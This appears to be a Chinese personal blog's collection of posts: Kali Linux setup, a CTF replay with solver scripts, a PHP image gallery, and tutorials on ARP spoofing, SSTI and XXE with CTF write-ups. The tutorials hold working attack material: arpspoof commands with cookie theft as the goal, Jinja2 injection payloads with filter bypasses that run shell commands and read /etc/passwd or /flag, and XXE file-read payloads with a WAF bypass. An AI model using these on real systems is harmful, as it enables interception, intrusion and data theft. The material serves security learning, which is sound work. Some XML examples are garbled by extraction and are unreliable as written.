Ziworld

kali配置

2025-08-30T12:58:00.000Z

kali安装

地址：https://pan.baidu.com/s/1yq5LOz3Dr7nbk0PCRmiTog

将下载后的压缩包解压，里面有一堆文件。然后打开虚拟机

默认账号密码是kali

配置语言

1	dpkg-reconfigure locales

鼠标中间和上下键进行移动，空格键选取，Enter键确认

汉化成功后选择保存旧的名称

汉化后的样式

apt换源

1	vim /etc/apt/sources.list

按i键，注释掉原先的，换成中科大的源

1 2	deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

按Esc，然后:wq Enter

如果这时执行apt update，会显示

需要导入公钥

1	wget -q -O - https://archive.kali.org/archive-key.asc \| gpg --dearmor \| sudo tee /etc/apt/trusted.gpg.d/kali-archive-keyring.gpg > /dev/null

依次执行下面的命令

apt-get update          #更新索引
apt-get upgrade         #更新软件
apt-get dist-upgrade    #升级
apt-get clean           #删除缓存包
apt-get autoclean       #删除未安装的deb包

pip2安装

kali上只有pip3，有时旧的项目用的python2需要安装一些模块，就需要pip2

# 下载 get-pip.py 脚本（Python 2 专用版本）
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py

# 用 Python 2 运行脚本安装 pip2
python2 get-pip.py

# 验证安装
pip2 --version

pip换源

为 pip2 和 pip3 创建通用的配置目录

1	mkdir -p ~/.pip

创建并编辑 pip.conf 配置文件，这个文件会同时被 pip2 和 pip3 识别（Kali 中两者默认会读取此路径的配置）：

1	nano ~/.pip/pip.conf

在文件中添加以下内容（阿里云镜像源配置）：

[global]
index-url = http://mirrors.aliyun.com/pypi/simple/
[install]
trusted-host = mirrors.aliyun.com

保存并退出（按 Ctrl+O 保存，Ctrl+X 退出 nano 编辑器）

安装CopyQ

kali上是没有类似window上win+v显示历史剪贴板的功能。可以安装CopyQ，内有截图和历史剪贴板功能

1	apt install copyq

汉化

右上角

安装中文输入法

# 更新系统
apt update && sudo apt upgrade -y

# 安装 fcitx 框架及依赖
apt install fcitx fcitx-bin fcitx-table -y

打开https://shurufa.sogou.com/linux下载

#切换目录后安装
dpkg -i sogoupinyin_4.2.1.145_amd64.deb

#重启
reboot

重启后右上角会有图标，Ctrl+空格 切换语言

ssh连接kali

我比较喜欢用tabby

虚拟机上

# 启动SSH服务
systemctl start ssh

# 设置开机自启
systemctl enable ssh 

# 检查服务状态（确认是否正常运行）
systemctl status ssh  # 显示active (running)即为正常

按虚拟机上面那个键，下面会显示ip

tabby连接（或者cmd上ssh 用户名@服务器IP -p 端口号）

校赛3复现

2025-08-25T12:28:00.000Z

web1

import requests
import time
import hashlib
import io
from PIL import Image

# --- 全局配置 ---
HOST = "http://challenge.sky233.top:32923" 

# --- 挑战1: Cookie持久化请求 ---
def solve_challenge1(session):
    """使用同一个会话发送100次请求以获取Flag。"""
    print("--- 开始挑战 1: Cookie持久化请求 ---")
    url = f'{HOST}/api/challenge1'
    try:
        for i in range(100):
            response = session.get(url)
            response.raise_for_status()
            if (i + 1) % 10 == 0:
                print(f"  已发送 {i+1}/100 次请求...")
        
        flag = response.json().get('flag', 'Flag not found')
        print(f"[+] 挑战 1 成功! Flag: {flag}\n")
        return flag
    except requests.RequestException as e:
        print(f"[-] 挑战 1 失败: {e}\n")
        return None

# --- 挑战2: 时间戳Token验证 ---
def solve_challenge2(session):
    """根据每分钟变化的时间戳生成Token并提交。"""
    print("--- 开始挑战 2: 时间戳Token验证 ---")
    url = f'{HOST}/api/challenge2'
    try:
        minute_timestamp = int(time.time()) // 60
        token = hashlib.md5(str(minute_timestamp).encode('utf-8')).hexdigest()
        
        print(f"  使用分钟时间戳 {minute_timestamp} 生成的 Token: {token}")
        
        payload = {"token": token}
        response = session.post(url, json=payload)
        response.raise_for_status()
        
        flag = response.json().get('flag', 'Flag not found')
        print(f"[+] 挑战 2 成功! Flag: {flag}\n")
        return flag
    except requests.RequestException as e:
        print(f"[-] 挑战 2 失败: {e}\n")
        return None

# --- 挑战3: 重定向链处理 ---
def solve_challenge3(session):
    """自动跟随JSON响应中的'next'参数，直到找到Flag。"""
    print("--- 开始挑战 3: 重定向链处理 ---")
    base_url = f"{HOST}/api/challenge3"
    next_step = "step1"
    
    while next_step:
        try:
            params = {"next": next_step}
            response = session.get(base_url, params=params)
            response.raise_for_status()
            data = response.json()
            
            print(f"  访问 next='{next_step}', 响应: {data}")

            if data.get('success'):
                flag = data.get('flag', 'Flag not found')
                print(f"[+] 挑战 3 成功! Flag: {flag}\n")
                return flag
            
            next_step = data.get('next')
            if not next_step:
                 print("[-] 响应中未找到 'next' 参数，链条中断。\n")
                 return None
            time.sleep(0.1)

        except requests.RequestException as e:
            print(f"[-] 挑战 3 请求失败: {e}\n")
            return None
        except ValueError:
            print(f"[-] 挑战 3 失败: 无法解析JSON响应。\n")
            return None

# --- 挑战4: 文件上传验证 ---
def solve_challenge4(session):
    """创建一个包含特定内容的文件并上传。"""
    print("--- 开始挑战 4: 文件上传验证 ---")
    url = f'{HOST}/api/challenge4'
    content = "CTF_FILE_UPLOAD_SUCCESS"
    
    try:
        with io.BytesIO(content.encode('utf-8')) as file_in_memory:
            files = {'file': ('challenge.txt', file_in_memory, 'text/plain')}
            print(f"  正在上传包含 '{content}' 的文件...")
            response = session.post(url, files=files)
            response.raise_for_status()
        
        data = response.json()
        if data.get('success'):
            flag = data.get('flag', 'Flag not found')
            print(f"[+] 挑战 4 成功! Flag: {flag}\n")
            return flag
        else:
            print(f"[-] 文件上传失败: {data.get('error', '未知错误')}\n")
            return None
            
    except requests.RequestException as e:
        print(f"[-] challenge 4 失败: {e}\n")
        return None

# --- 挑战5: 人工识别验证码 ---
def solve_challenge5_manual(session):
    """下载验证码图片，由用户手动输入识别结果。"""
    print("--- 开始挑战 5: 人工识别验证码 ---")
    captcha_url = f'{HOST}/api/captcha'
    challenge_url = f'{HOST}/api/challenge5'
    
    try:
        # 1. 获取并展示验证码图片
        print("  正在下载验证码图片...")
        response_img = session.get(captcha_url)
        response_img.raise_for_status()
        
        img = Image.open(io.BytesIO(response_img.content))
        print("  验证码图片已打开，请查看图片并输入内容。")
        img.show()  # 这会调用系统默认的图片查看器打开图片
        
        # 2. 获取用户输入
        captcha_text = input("  请输入您看到的验证码: ").strip()
        
        if not captcha_text:
            print("[-] 未输入任何内容，跳过挑战 5。\n")
            return None
            
        # 3. 提交识别结果
        print(f"  正在提交您的输入: '{captcha_text}'")
        payload = {"captcha": captcha_text}
        response = session.post(challenge_url, json=payload)
        response.raise_for_status()
        
        data = response.json()
        # 检查服务器返回的成功状态
        if data.get('success'):
            flag = data.get('flag', 'Flag not found')
            print(f"[+] 挑战 5 成功! Flag: {flag}\n")
            return flag
        else:
            error_message = data.get('error', '验证失败，但未提供原因。')
            print(f"[-] 挑战 5 失败: {error_message}\n")
            return None
        
    except requests.RequestException as e:
        print(f"[-] 挑战 5 失败: {e}\n")
        return None
    except Exception as e:
        print(f"[-] 挑战 5 发生未知错误: {e}\n")
        return None

# --- 主执行函数 ---
if __name__ == "__main__":
    with requests.Session() as s:
        s.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
        })
        
        flag1 = solve_challenge1(s)
        flag2 = solve_challenge2(s)
        flag3 = solve_challenge3(s)
        flag4 = solve_challenge4(s)
        flag5 = solve_challenge5_manual(s)
        
        print("="*30)
        print("所有挑战已完成，结果如下:")
        print(f"Challenge 1 Flag: {flag1}")
        print(f"Challenge 2 Flag: {flag2}")
        print(f"Challenge 3 Flag: {flag3}")
        print(f"Challenge 4 Flag: {flag4}")
        print(f"Challenge 5 Flag: {flag5}")
        print("="*30)

神秘的图片

对照出来如下，/为未知的

1	inZgc/tzEBrwY/LDNMQEcmJB

加上图片的名字base32解码，脚本跑盲猜

import base64
import string

def decode_with_unknowns(encoded_str):
    # Base32编码中允许的字符 (A-Z, 2-7)
    base32_chars = string.ascii_uppercase + '234567'
    
    # 找到未知字符的位置
    unknown_positions = [i for i, c in enumerate(encoded_str) if c == '/']
    
    if len(unknown_positions) != 2:
        print(f"错误：需要正好2个未知字符，实际找到{len(unknown_positions)}个")
        return
    
    # 尝试所有可能的字符组合
    count = 0
    valid_results = []
    
    for c1 in base32_chars:
        for c2 in base32_chars:
            # 替换未知字符
            temp = list(encoded_str)
            temp[unknown_positions[0]] = c1
            temp[unknown_positions[1]] = c2
            candidate = ''.join(temp)
            
            try:
                # 尝试解码Base32
                decoded = base64.b32decode(candidate)
                # 尝试将解码结果转换为字符串
                decoded_str = decoded.decode('utf-8', errors='ignore')
                # 简单过滤掉大部分无意义的结果
                if len(decoded_str.strip()) > 0 and any(c.isprintable() for c in decoded_str):
                    valid_results.append((c1, c2, decoded_str))
                    print(f"找到可能结果: {c1}, {c2} -> {decoded_str[:50]}...")
            except:
                pass
            
            count += 1
            if count % 100 == 0:
                print(f"已尝试{count}/{len(base32_chars)**2}种组合")
    
    print(f"\n总共找到{len(valid_results)}个可能的有效结果")
    return valid_results

# 待解码的字符串
encoded_string = "inZgc/tzEBrwY/LDNMQEcmJB5C7ZTZUYV7SLRKXIUGUONIF44WM2ELROF3SL3IHIV62OJOEN5CB33ZF3UV4GY43Y42EZHZN4QA76TAVDFYXC4==="

# 注意：Base32通常使用大写字母，这里先转换为大写
encoded_string = encoded_string.upper()

# 执行解码
results = decode_with_unknowns(encoded_string)

# 打印前几个结果
if results:
    print("\n前5个可能的结果:")
    for i, (c1, c2, result) in enumerate(results[:5]):
        print(f"{i+1}. 替换字符: {c1} 和 {c2} -> 结果: {result}")

010打开，里面有段字符

修改后缀xlsm打开

把key填上

双击A1

在表格中发现了一个链接和一个图片，LSB隐写

壁纸

左上角

左上角第一个像素为26,17

竖方向每个点宽距为35

横方向每个点宽距为53

(这宽距竟然有误差)

竖方向共有29个，横方向共有29个

from PIL import Image, ImageDraw

def find_best_pixel_on_line(pixels, start_x, start_y, end_x, end_y):
    """
    在一条直线（水平或垂直）上搜索最接近黑色或白色的像素点。
    返回该点的精确坐标。
    """
    min_dist_sq = float('inf')
    best_coord = (start_x, start_y) # 默认使用起始点

    # 确定迭代范围
    x_range = range(min(start_x, end_x), max(start_x, end_x) + 1)
    y_range = range(min(start_y, end_y), max(start_y, end_y) + 1)

    for x in x_range:
        for y in y_range:
            try:
                r, g, b = pixels[x, y][:3]
                
                # 计算到纯黑和纯白的颜色距离平方
                dist_to_black_sq = r**2 + g**2 + b**2
                dist_to_white_sq = (255 - r)**2 + (255 - g)**2 + (255 - b)**2
                current_min_dist_sq = min(dist_to_black_sq, dist_to_white_sq)

                if current_min_dist_sq < min_dist_sq:
                    min_dist_sq = current_min_dist_sq
                    best_coord = (x, y)
            except IndexError:
                continue
                
    return best_coord

def extract_calibrated_and_amplify(input_image_path, output_image_path):
    """
    校准行列位置，提取像素点，并放大合成新图片。
    """
    # --- 基础参数 ---
    start_x, start_y = 26, 17
    h_spacing, v_spacing = 53, 35
    num_points = 29

    # --- 可调整参数 ---
    # 校准时搜索的范围（半径）
    CALIBRATION_SEARCH_RADIUS = 15 
    # 新图片中每个点放大后的方块尺寸（像素）
    BLOCK_SIZE = 10
    # 新图片边缘的留白（像素）
    PADDING = 20

    try:
        original_image = Image.open(input_image_path).convert('RGB')
        original_pixels = original_image.load()
        print(f"成功加载原始图片: {input_image_path}")
    except FileNotFoundError:
        print(f"错误：找不到文件 '{input_image_path}'。")
        return
    except Exception as e:
        print(f"打开图片时发生错误: {e}")
        return

    # --- 步骤1: 网格校准 ---
    calibrated_x_coords = [0] * num_points
    calibrated_y_coords = [0] * num_points

    print("开始校准网格位置...")
    # 校准每一行的Y坐标
    for j in range(num_points):
        theoretical_y = start_y + j * v_spacing
        # 在第一个点的理论位置附近进行垂直搜索
        best_coord = find_best_pixel_on_line(
            original_pixels,
            start_x, theoretical_y - CALIBRATION_SEARCH_RADIUS,
            start_x, theoretical_y + CALIBRATION_SEARCH_RADIUS
        )
        calibrated_y_coords[j] = best_coord[1] # 保存找到的精确y坐标
        print(f"  行 {j+1}/{num_points} 校准: 理论 Y={theoretical_y}, 实际 Y={calibrated_y_coords[j]}")

    # 校准每一列的X坐标
    for i in range(num_points):
        theoretical_x = start_x + i * h_spacing
        # 在第一个点的理论位置附近进行水平搜索
        best_coord = find_best_pixel_on_line(
            original_pixels,
            theoretical_x - CALIBRATION_SEARCH_RADIUS, start_y,
            theoretical_x + CALIBRATION_SEARCH_RADIUS, start_y
        )
        calibrated_x_coords[i] = best_coord[0] # 保存找到的精确x坐标
        print(f"  列 {i+1}/{num_points} 校准: 理论 X={theoretical_x}, 实际 X={calibrated_x_coords[i]}")

    print("网格校准完成！")

    # --- 步骤2: 图像合成与放大 ---
    # 计算新图片的尺寸
    output_size = num_points * BLOCK_SIZE + 2 * PADDING
    # 创建一个白色背景的新图片
    new_image = Image.new('RGB', (output_size, output_size), 'white')
    draw = ImageDraw.Draw(new_image)

    print("开始提取像素并合成新图片...")
    # 遍历29x29网格
    for j in range(num_points):
        for i in range(num_points):
            # 使用校准后的精确坐标
            extract_x = calibrated_x_coords[i]
            extract_y = calibrated_y_coords[j]

            # 获取像素颜色并判断是黑是白
            r, g, b = original_pixels[extract_x, extract_y]
            dist_to_black_sq = r**2 + g**2 + b**2
            dist_to_white_sq = (255 - r)**2 + (255 - g)**2 + (255 - b)**2

            final_color = "black" if dist_to_black_sq < dist_to_white_sq else "white"
            
            # 在新图片上画一个放大的色块
            # 计算色块的左上角和右下角坐标
            top_left_x = PADDING + i * BLOCK_SIZE
            top_left_y = PADDING + j * BLOCK_SIZE
            bottom_right_x = top_left_x + BLOCK_SIZE
            bottom_right_y = top_left_y + BLOCK_SIZE
            
            draw.rectangle(
                [ (top_left_x, top_left_y), (bottom_right_x, bottom_right_y) ],
                fill=final_color,
                outline=None # 不需要边框
            )

    try:
        new_image.save(output_image_path)
        print(f"提取与合成完成！放大后的图片已保存为: {output_image_path}")
    except Exception as e:
        print(f"保存新图片时发生错误: {e}")


# --- 使用示例 ---
if __name__ == "__main__":
    # 1. 将 'your_original_image.png' 替换成您的图片文件名
    input_file = "wallpaper.png"

    # 2. 这是最终生成的放大后的图片文件
    output_file = "final_amplified_image.png"

    extract_calibrated_and_amplify(input_file, output_file)

行 1/29 校准: 理论 Y=17, 实际 Y=17
  行 2/29 校准: 理论 Y=52, 实际 Y=52
  行 3/29 校准: 理论 Y=87, 实际 Y=88
  行 4/29 校准: 理论 Y=122, 实际 Y=123
  行 5/29 校准: 理论 Y=157, 实际 Y=158
  行 6/29 校准: 理论 Y=192, 实际 Y=194
  行 7/29 校准: 理论 Y=227, 实际 Y=229
  行 8/29 校准: 理论 Y=262, 实际 Y=264
  行 9/29 校准: 理论 Y=297, 实际 Y=300
  行 10/29 校准: 理论 Y=332, 实际 Y=335
  行 11/29 校准: 理论 Y=367, 实际 Y=370
  行 12/29 校准: 理论 Y=402, 实际 Y=406
  行 13/29 校准: 理论 Y=437, 实际 Y=441
  行 14/29 校准: 理论 Y=472, 实际 Y=476
  行 15/29 校准: 理论 Y=507, 实际 Y=512
  行 16/29 校准: 理论 Y=542, 实际 Y=547
  行 17/29 校准: 理论 Y=577, 实际 Y=582
  行 18/29 校准: 理论 Y=612, 实际 Y=617
  行 19/29 校准: 理论 Y=647, 实际 Y=653
  行 20/29 校准: 理论 Y=682, 实际 Y=688
  行 21/29 校准: 理论 Y=717, 实际 Y=723
  行 22/29 校准: 理论 Y=752, 实际 Y=759
  行 23/29 校准: 理论 Y=787, 实际 Y=794
  行 24/29 校准: 理论 Y=822, 实际 Y=829
  行 25/29 校准: 理论 Y=857, 实际 Y=865
  行 26/29 校准: 理论 Y=892, 实际 Y=900
  行 27/29 校准: 理论 Y=927, 实际 Y=935
  行 28/29 校准: 理论 Y=962, 实际 Y=971
  行 29/29 校准: 理论 Y=997, 实际 Y=1006
  列 1/29 校准: 理论 X=26, 实际 X=26
  列 2/29 校准: 理论 X=79, 实际 X=79
  列 3/29 校准: 理论 X=132, 实际 X=132
  列 4/29 校准: 理论 X=185, 实际 X=185
  列 5/29 校准: 理论 X=238, 实际 X=238
  列 6/29 校准: 理论 X=291, 实际 X=291
  列 7/29 校准: 理论 X=344, 实际 X=344
  列 8/29 校准: 理论 X=397, 实际 X=397
  列 9/29 校准: 理论 X=450, 实际 X=450
  列 10/29 校准: 理论 X=503, 实际 X=503
  列 11/29 校准: 理论 X=556, 实际 X=556
  列 12/29 校准: 理论 X=609, 实际 X=609
  列 13/29 校准: 理论 X=662, 实际 X=662
  列 14/29 校准: 理论 X=715, 实际 X=715
  列 15/29 校准: 理论 X=768, 实际 X=768
  列 16/29 校准: 理论 X=821, 实际 X=820
  列 17/29 校准: 理论 X=874, 实际 X=873
  列 18/29 校准: 理论 X=927, 实际 X=926
  列 19/29 校准: 理论 X=980, 实际 X=979
  列 20/29 校准: 理论 X=1033, 实际 X=1032
  列 21/29 校准: 理论 X=1086, 实际 X=1085
  列 22/29 校准: 理论 X=1139, 实际 X=1138
  列 23/29 校准: 理论 X=1192, 实际 X=1191
  列 24/29 校准: 理论 X=1245, 实际 X=1244
  列 25/29 校准: 理论 X=1298, 实际 X=1297
  列 26/29 校准: 理论 X=1351, 实际 X=1350
  列 27/29 校准: 理论 X=1404, 实际 X=1403
  列 28/29 校准: 理论 X=1457, 实际 X=1456
  列 29/29 校准: 理论 X=1510, 实际 X=1509
  对照点看着都对呀，就是扫不出来码o(╥﹏╥)o

图片库

2025-08-12T11:28:00.000Z

ImagesGallery

使用php写的图片展示。存储图片的公链，然后展示出来，并且能右键复制公链，附带随机图片api

演示：https://t.ziworld.top/

食用

依照下面配置后放入php环境中即可使用

创建分类

在categories文件夹中创建 分类名.txt 的文件(可以使用中文)

分类名.txt 中存储图片公链链接，一行一个

配置

在index.php中第3行开始配置

$CATEGORY_DIR = 'categories'; // 存放分类txt文件的目录

$SITE_TITLE = '图片公链存储'; // 网站标题 (此版本中不再直接显示)

$DEFAULT_CATEGORY = 'PC'; // 默认展示的分类

$THUMB_SIZE = 300; // 缩略图大小（主要用于Unsplash URL参数，非服务器端处理）

api

api/index.php中第3行开始配置

1 2	$category_dir = '../categories'; // 分类目录 $default_category = 'PC'; // 默认分类

使用：说明文档 - 图片公链存储 API

效果图：

源码：https://github.com/airesein/ImagesGallery

ARP中间人攻击

2025-08-11T12:28:00.000Z

什么是ARP

ARP协议是“Address Resolution Protocol”（地址解析协议）的缩写。

在局域网环境中，数据的传输所依懒的是MAC地址而非IP地址，而将已知IP地址转换为MAC地址的工作是由ARP协议来完成的。

工作流程

局域网内有设备 A（IP：192.168.2.97，MAC：10:5f:ad:ba:a3:2e）和设备 B（IP：192.168.2.180，MAC：0c:b9:83:5c:9c:06），当 A 需要向 B 发送数据时，ARP 的工作步骤如下：

1. 检查本地 ARP 缓存表

设备 A 首先查询自己的ARP 缓存表，查看是否有 192.168.2.180 对应的 MAC 地址：

若缓存表中已有记录（如之前通信过），A 直接使用该 MAC 地址封装数据帧并发送给 B，流程结束。
若缓存表中无记录，进入下一步。

2. 发送 ARP 请求报文（广播）

设备 A 生成一个ARP 请求报文，内容为：
“谁有 IP 地址 192.168.2.180？请将你的 MAC 地址告诉我，我的 IP 是 192.168.2.97，MAC 是 10:5f:ad:ba:a3:2e。”
该报文通过广播方式发送（目标 MAC 地址为FF:FF:FF:FF:FF:FF），即局域网内所有设备都会收到该请求。

3. 接收并响应 ARP 请求（单播）

局域网内所有设备收到 ARP 请求后，会检查报文中的目标 IP 地址是否与自己的 IP 一致：

非目标设备（如其他设备 C、D）会忽略该请求。
目标设备 B 发现请求中的 IP 地址（192.168.2.180）与自己的 IP 一致，会生成ARP 响应报文，内容为：
“我是 192.168.2.180，我的 MAC 地址是 0c:b9:83:5c:9c:06。”
该报文通过单播方式直接发送给设备 A（目标 MAC 为 A 的 MAC 地址）。

4. 更新 ARP 缓存表并通信

设备 A 收到 B 的 ARP 响应后，会将 “IP：192.168.2.180 → MAC：0c:b9:83:5c:9c:06” 的映射关系存入自己的 ARP 缓存表
之后，A 即可使用 B 的 MAC 地址封装数据帧，实现与 B 的直接通信。

ARP中间人攻击原理

概述

中间人攻击（Man-in-the-MiddleAttack，简称“MITM攻击”）是一种“间接”的入侵攻击，这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间，这台计算机就称为“中间人”。

攻击原理

利用ARP协议漏洞进行的攻击—ARP欺骗

1、PC1给PC3发送数据：网络层（IP包）
10.1.1.1 10.1.1.3 端口号 Hello,PC3 (源IP地址目标IP 源端口号目标端口号数据)
2、到数据链路层后：数据帧包
__ AA 10.1.1.1 10.1.1.3 端口号 Hello,PC3 (目标MAC地址[PC3的未知] 源MAC地址源IP地址目标IP 源端口号目标端口号数据)
3、ARP协议出现
“我是10.1.1.1，我的MAC地址为AA，谁是10.1.1.3，你的MAC地址是什么呀？”ARP协议发送广播MAC地址（FF-FF-…12个F）：FF AA 10.1.1.1 10.1.1.3 端口号 Hello,PC3
4、局域网内所有主机都收到这个广播，PC2会丢弃这个包；PC3收到包后会单播应答它，CC AA 10.1.1.1 10.1.1.3 端口号 Hello,PC1，并通过交换机查询MAC地址表，将响应包传递给PC1，PC1会在第一时间建立一个ARP缓存表：10.1.1.3 CC；
5、漏洞出现：ARP缓存表遵循的规则是谁后到达就学习谁，由于ARP没有验证功能，所以PC2使用攻击工具不停发送虚假的ARP应答，PC1的ARP缓存表就会变成了10.1.1.3 BB；
6、从此PC1发送数据就要先经过PC2，（BB AA 10.1.1.1 10.1.1.3 端口号数据），PC2截获获取数据后再修改目标MAC地址（CC AA 10.1.1.1 10.1.1.3 端口号数据），然后转发给PC3，完成攻击。

实操

Win

工具：alandau/arpspoof：适用于 Windows 的简单 ARP 欺骗器

D:\CTFtool\ARP>arpspoof.exe --help
arpspoof.exe --list | [-i iface] [--oneway] victim-ip [target-ip]

victim-ip：受害者IP，即被攻击主机的IP；

target-ip：目标IP，它指伪装的IP。比如，主机A要想获取主机B访问外部网络的流量，那么目标IP则是受攻击主机IP的默认网关。主机A要想获取主机B访问同网段的其它主机C的流量，那么目标IP则是主机C的IP。**当“target-ip”未指定是，默认指向受攻击主机IP的默认网关。**

--oneway：默认情况下，攻击主机获取的流量是双向的，即victim -> target和 target -> victim 。使用“—oneway”参数，攻击主机仅获取victim -> target方向的流量；

-i：指定攻击主机发送arp攻击报文的网卡。未指定的情况下，攻击主机将自动根据攻击主机和受攻击主机的IP和掩码来选定。确实需要指定的话，可先使用“--list”参数，查看可用网卡，然后使用“-i”参数指定具体的网卡，例如：-i \Device\NPF_{F569706A-1B6B-47D7-B89D-0E4EE8A166CE}；

列出可用的网卡

1	arpspoof.exe --list

开始欺骗

wireshark过滤数据包

盗取用户cookie

kali

1 2	fping -g 192.168.2.0/24 -a -q 只输出192.168.2.0/24能ping通的地址 -q隐藏详细过程 -a存活

1	nmap -sn 192.168.1.0/24 # 仅检测192.168.1.0/24网段的存活主机

注意
如果未开启 IP 转发：你的机器会直接丢弃这些流量，导致目标主机和网关之间的通信彻底中断（目标会发现断网并快速恢复 ARP 缓存，攻击效果短暂且明显）
linux系统出于安全考虑禁止了IP转发功能，所以需要手动打开，在/proc/sys/net/ipv4/ip_forward里面数值是0，改为1就允许了IP转发
使用echo 1 > /proc/sys/net/ipv4/ip_forward 实现该操作

arpspoof -i eth0 -t 192.168.2.180 192.168.2.1
# 终端1：欺骗目标主机（让它认为你是网关）

arpspoof -i eth0 -t 192.168.2.1 192.168.2.180
# 终端2：欺骗网关（让它认为你是目标主机）

echo 1 > /proc/sys/net/ipv4/ip_forward 
#开启转发

SSTI

2025-08-05T04:52:00.000Z

SSTI 漏洞概述

SSTI（Server-Side Template Injection，服务器端模板注入），主要发生在 Web 应用使用模板引擎动态渲染页面内容的场景中。当应用程序未对用户输入的内容进行严格过滤或转义，直接将用户可控数据嵌入到模板中进行解析渲染时，攻击者就可能通过构造恶意输入来注入模板代码，从而执行任意命令、读取敏感文件或获取服务器权限。

模板引擎的设计初衷是将页面逻辑与数据展示分离，提高开发效率。常见的模板引擎包括 Python 的 Jinja2、Django Template，PHP 的 Smarty、Twig，Java 的 FreeMarker、Velocity，Node.js 的 EJS、Handlebars 等。

SSTI 漏洞成因

SSTI 漏洞的核心成因是用户输入未经过安全处理直接嵌入模板，具体可分为以下几种情况：

直接拼接用户输入到模板字符串：例如在 Python 中使用render_template_string("Hello, %s" % user_input)，若user_input包含模板语法，会被引擎解析执行。
模板路径 / 名称可控：攻击者通过控制模板文件路径，加载恶意模板文件或系统敏感文件（如/etc/passwd）。
模板变量赋值不当：将用户输入直接作为模板变量的值，且变量在模板中被以执行代码的方式调用（如{{ user_input }}在某些引擎中可执行表达式）。

使用

输入{{ 7*7 }}，若页面返回49，说明模板引擎执行了表达式，可能存在漏洞。
输入{{ config }}（Jinja2），若返回配置信息，证明漏洞存在
读取配置文件：{{ config.items() }}（Jinja2）可获取应用配置，包括数据库账号密码等。
读取系统文件：在支持文件操作的引擎中，可通过{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}（Jinja2）读取/etc/passwd。

Jinja2

控制结构 {% %} 可以声明变量，也可以执行语句
变量取值 {{ }} 用于将表达式打印到模板输出
注释块 {# #} 用于注释

__class__
  查看对象所在的类
__mro__
  查看继承关系和调用顺序，返回元组
__base__
  返回基类
__bases__
  返回基类元组
__subclasses__()
  返回子类列表
__init__
  调用初始化函数，可以用来跳到__globals__
__globals__
  返回函数所在的全局命名空间所定义的全局变量，返回字典
__builtins__
  返回内建内建名称空间字典
__dic__
  返回类的静态函数、类函数、普通函数、全局变量以及一些内置的属性
__getitem__()
  调用字典中的键值，比如a['b']，就是a.__getitem__('b')
__import__
  动态加载类和函数，也就是导入模块，经常用于导入os模块，__import__('os').popen('ls').read()]
__str__()
  返回描写这个对象的字符串，就是打印出来。

实战

[LitCTF 2025]星愿信箱

环境：[LitCTF 2025]星愿信箱 | NSSCTF

看有哪些函数

通过 config对象调用 os.popen执行 ls /

发现有flag,cat别屏蔽了，head /flag查看

[HNCTF 2022 WEEK2]ez_SSTI

环境：[HNCTF 2022 WEEK2]ez_SSTI | NSSCTF

参数是name，且没过滤

1	http://node5.anna.nssctf.cn:24127/?name={{7*7}}

ls看一下

1	name={{config.__class__.__init__.__globals__[%27os%27].popen(%27ls%27).read()}}

获得flag

1	name={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

[安洵杯 2020]Normal SSTI

环境：[安洵杯 2020]Normal SSTI | NSSCTF

知识点

|attr(“__class__”)等于

.__class__

flask里的lipsum方法,可以得到__builtins__，且lipsum.__globals__含有os模块

发现{{}}被过滤了，但

1	{%print()%}

还能用，**.和[]**也被过滤了

1	lipsum\|attr("__globals__")

Unicode 编码

1	lipsum\|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f")

获取os

获取popen()

read输出

[HNCTF 2022 WEEK3]ssssti

环境：[HNCTF 2022 WEEK3]ssssti | NSSCTF

参数是name

发现有过滤，这些都用不了 \, ", args, os, _，"
也不能用{%%}

尝试用request.cookies，可以通过cookies传入参数。

1
2
3

payload

{{self.__dict__._TemplateReference__context.lipsum.__globals__.__builtins__.open("/flag").read()}}

使用request.cookies构造

1
2
3

?name={{self[request.cookies.c][request.cookies.d][request.cookies.e][request.cookies.f][request.cookies.g].open(request.cookies.z).read()}}

cookie:c=__dict__;d=_TemplateReference__context;e=lipsum;f=__globals__;g=__builtins__;z=flag

获得falg

XXE

2025-08-04T12:28:00.000Z

什么是XXE

XXE（XML External Entity Injection）XML 外部实体注入的缩写。解析时未对XML外部实体加以限制，导致攻击者将恶意代码注入到XML中，导致服务器加载恶意的外部实体引发文件读取，SSRF，命令执行等危害操作。

什么是XML

XML指可扩展标记语言（EXtensible Markup Language）

XML的设计宗旨是传输数据，而不是显示数据

XML不会做任何事情。XML被设计用来结构化、存储以及传输信息

XML和HTML的区别

XML被设计用来传输和存储数据，其焦点是数据的内容

HTML被设计用来显示数据，其焦点是数据的外观

实体与外部实体

内部实体：，使用时通过 &name; 引用。
外部实体：，本地文件路径（如 file:///etc/passwd）、网络地址（如 http://example.com）等。

当 XML 解析器未禁用外部实体解析功能时，攻击者可构造包含恶意外部实体的 XML 数据，使解析器加载外部资源，从而触发漏洞。

 
root [
        hello "world">

    ]>
<root>
    &hello;

root>

指定版本和编码方式

主体是由<></>,且根标记只能有一个

XML DTD做用来做约束，SYSTEM引用本地，PUBLIC引用远程

1
2
3

]>

外部实体支持http、file等协议。不同程序支持的协议不同

触发条件

XXE 触发需满足两个条件：

应用接受 XML 输入：应用存在解析 XML 数据的功能（如 API 接口、文件上传、配置解析等）。
解析器配置不安全：解析器允许解析外部实体，且未限制实体访问的权限（如允许读取本地文件、发起网络请求）。

题目

[CSAWQual 2019]Unagi

环境：[CSAWQual 2019]Unagi | NSSCTF

题目描述
flag在/flag。

看一下样本

文件读取


users [
xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bobusername>
        <password>passwd2password>
        <name> Bobname>
        <email>bob@fakesite.comemail>  
        <group>CSAW2019group>
        <intro>&xxe;intro>
    user>
users>

显示被WAF拦截了

转成utf-16编码绕过

[NCTF 2019]Fake XML cookbook

环境：[NCTF 2019]Fake XML cookbook | NSSCTF

打开后一个登录页面

随便输点，抓包

post发送的好像就是xml，改一下，file读根目录flag

"1.0"?>
note [xxe SYSTEM "file:///flag">]>
<user>
        <username>
&xxe;
username>
        <password>
2
password>
user>

利用 XXE 执行 SSRF 攻击

环境:Lab: Exploiting XXE to perform SSRF attacks | Web Security Academy

描述：
